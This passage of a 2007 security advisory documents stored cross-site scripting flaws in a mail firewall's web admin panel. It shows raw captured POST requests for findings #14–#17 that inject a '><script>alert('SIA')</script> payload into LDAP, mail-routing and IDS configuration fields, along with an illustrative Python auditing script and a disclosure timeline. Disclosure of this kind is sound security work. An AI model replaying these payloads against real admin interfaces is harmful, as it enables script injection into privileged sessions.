procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean
%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBe
an%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRoutingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMenu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=enable_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.attrValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.langTagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTagId=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attrType=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
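
Added example, not part of the advisory and not vendor code: the captured bodies above carry each row's range pattern in attrValidate next to the submitted value, so captured traffic can be triaged by parsing the rows and checking every value against its own pattern. The function names and the two-row sample body are constructed for illustration, and the single-quoted attribute sink in render_input is an assumption based on the '> prefix of the submitted values.

```python
import html
import re
from urllib.parse import parse_qsl

# Constructed two-row excerpt in the shape of the XSS #17 body above.
SAMPLE_BODY = (
    "procId=10"
    "&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrValidate=%5B1-65535%5D"
    "&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
    "&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrValidate=%5B1-100%5D"
    "&rows%5B5%5D.attrValueStr=5"
)
ROW_FIELD = re.compile(r"rows\[(\d+)\]\.(\w+)")
RANGE = re.compile(r"\[(\d+)-(\d+)\]")   # e.g. [1-65535]; client-supplied, triage aid only
MARKUP = re.compile(r"[<>\"'`]")         # characters that can close an attribute or tag

def parse_rows(body):
    """Group the rows[N].field pairs of a urlencoded body by row index."""
    rows = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = ROW_FIELD.fullmatch(key)
        if m:
            rows.setdefault(int(m.group(1)), {})[m.group(2)] = value
    return rows

def check_value(value, pattern):
    """Findings for one value against the row's declared [lo-hi] pattern."""
    findings = []
    rng = RANGE.fullmatch(pattern)
    if rng and value and not (re.fullmatch(r"[0-9]+", value)
                              and int(rng.group(1)) <= int(value) <= int(rng.group(2))):
        findings.append("out-of-range")
    if MARKUP.search(value):
        findings.append("markup-chars")
    return findings

def audit(body):
    """Return {attrName: findings} for rows whose value fields fail a check."""
    report = {}
    for row in parse_rows(body).values():
        for field in ("attrValueStr", "attrValueStrClone"):
            found = check_value(row.get(field, ""), row.get("attrValidate", ""))
            if found:
                report[row.get("attrName", "?")] = found
    return report

def render_input(name, value):
    """Assumed sink: a single-quoted value attribute, escaped on output."""
    return "<input name='%s' value='%s'>" % (html.escape(name), html.escape(value))
```

Because the pattern arrives in the same request as the value, a server has to take the allowed range from its own configuration; the escaping in render_input is what keeps a stored value inert when it is written back into the page.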

.: [ TIMELINE ] :.

22/Mar/2007	- We publish the advisory.
07/Mar/2007	- Second contact. Provider didn't answer.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities found.

--=_gantz-15840-1174901611-0001-2--
